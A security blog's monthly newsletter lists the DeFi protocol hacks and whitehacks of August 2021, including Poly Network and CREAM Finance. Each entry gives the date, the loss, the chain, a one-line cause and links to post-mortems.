Sign in Subscribe
hacks

Monthly DeFi Blood Bath Report #4

adrianhetman

3 min read
Monthly DeFi Blood Bath Report #4
Photo by Kelly Sikkema / Unsplash

Welcome to another instance of the Blood Bath report. This month was the craziest one in the whole DeFi history due to two events: the Poly Network hack and Samczun’s Whitehack of Sushiswap.

This month we saw some big hacks, even excluding PolyNetwork. But what is also important, we saw some major white hacks that saved a lot of funds from well-known protocols 💪

Last month we witnessed hacks directed at the bridges. It’s no longer a case this month as a new contender entered the Blood Bath report. NFT.

Enough of the talk. Let’s dive into the topic. Below you will find a summary of all hacks that had happened. All info was compiled from  openblocksec , ~rekt.news~, Peckshield, and Blocksecteam

Popsicle Finance

When? Aug-03-2021
How much? $20.7M
Where? ETH
Why? Reward calculation error
Link: https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1

Wault Finance

When? Aug-04-2021
How much? $816K
Where? BSC
Why? Issue with $WUSD pegging mechanism
Link: https://waultfinance.medium.com/wusd-incident-recap-and-solution-1751a042e170

Casper DeFi

When? Aug-04-2021
How much? $172K
Where? BSC
Why? Malicious insider addded a backdoor to mint tokens
Link: https://casperdefi.medium.com/casper-defi-post-mortem-after-casper-token-hack-fe668f6722b9

Zerogoki

When? Aug-08-2021
How much? $670K
Where? ETH
Why? Price Oracle manipulation
Link: https://blocksecteam.medium.com/the-analysis-of-the-zerogoki-attack-da4e0807b1840

Poly Network

When? Aug-10-2021
How much? $611M * (most of that was returned)
Where? ETH, BSC, Polygon, Ontology
Why? Cross-chain message validation erro
Link: https://mudit.blog/poly-network-largest-crypto-hack/, https://www.rekt.news/polynetwork-rekt/, https://peckshield.medium.com/polynetwork-bug-review-and-patch-analysis-88bde8441297

Punk Protocol

When? Aug-10-2021
How much? $8.95M
Where? ETH
Why? Reinitialized contract
Link: https://www.rekt.news/punkprotocol-rekt/

Neko Network

When? Aug-11-2021
How much? $4M
Where? ETH
Why? Logic error in a lending protocol
Link: https://blog.mazeprotocol.com/neko-hacking-incident-report-e46cdf179fd9

CryptoVenetians NFT

When? Aug-11-2021
How much? $5M
Where? ETH
Why? Stolen Private Keys
Link: https://docs.google.com/document/d/1ebAPc0-gZsJAhxUZpoDFZEZCBhaCWzLshAVxmzcwnw0/edit#heading=h.bqti7y3gd1km

DAO Maker

When? Aug-12-2021
How much? $7M
Where? ETH
Why? Stolen Private Keys
Link: https://blocksecteam.medium.com/the-analysis-of-the-daomaker-attack-32365c37e7fc

Ref Finance

When? Aug-14-2021
How much? $3.2M
Where? NEAR
Why? Logic error
Link: https://twitter.com/finance_ref/status/1426649258812448774

Curve Bribe / Whitehack

When? Aug-14-2021
How much? $117K
Where? ETH
Why? Whitehack
Link: https://twitter.com/bantg/status/1426629982328180737

SushiSwap / Whitehack

When? Aug-17-2021
How much? $350M
Where? ETH
Why? Whitehack
Link: https://www.paradigm.xyz/2021/08/two-rights-might-make-a-wrong/

xSurge

When? Aug-17-2021
How much? $4M
Where? BSC
Why? Re-entrancy
Link: https://twitter.com/BlockSecTeam/status/1427482803134894080

Pinecone Finance

When? Aug-18-2021
How much? $17.5K
Where? BSC
Why? Insufficient validation Impact
Link: https://twitter.com/peckshield/status/1428233500260511746

Solend

When? Aug-19-2021
How much? $16K
Where? Solana
Why? Insecure Authentication
Link: https://docs.google.com/document/d/1-WoQwT1QrPEX-r4N-fDamRQ50LM8DsdsOyq1iTabS3Q/edit#

X-Token

When? Aug-30-2021
How much? $4.5M
Where? ETH
Why? Flash-loan
Link: https://rekt.news/xtoken-rekt-x2/

CREAM Finance

When? Aug-30-2021
How much? $18.8M
Where? ETH
Why? Flash-loan
Link: https://rekt.news/cream-rekt/

In hacks alone, excluding PolyNetwork, we saw ~$77.84M gone from various DeFi protocols on different chains. We saw first Solana’s DeFi hack. With the NFT exploding again, hackers are eyeing that market and trying to exploit the protocols.

We also had two whitehacks saving quite a substantial amount of money.

In the next reports, I will also take information from Immunefi to learn how much bug bounties had helped saved each month.

Stay safe out there, and remember that we’re still early in blockchain, and it will take time until the numbers of hacks and their impact will go down.

Thanks for reading, and if you like my writing, you can subscribe to my blog to receive the newsletter. Subscription box below 👇

If the newsletter is not your thing, check out my Twitter @adrianhetman, where I post and share exciting news from the Blockchain world and security.

Sign up for more like this.

Enter your email
Subscribe